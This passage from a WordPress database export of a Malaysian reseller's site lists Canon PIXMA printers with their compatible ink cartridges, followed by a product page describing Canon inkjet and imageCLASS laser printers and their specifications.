Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 17:20:48','2019-09-24 09:20:48','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3314,1,'2019-09-24 17:22:03','2019-09-24 09:22:03','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" 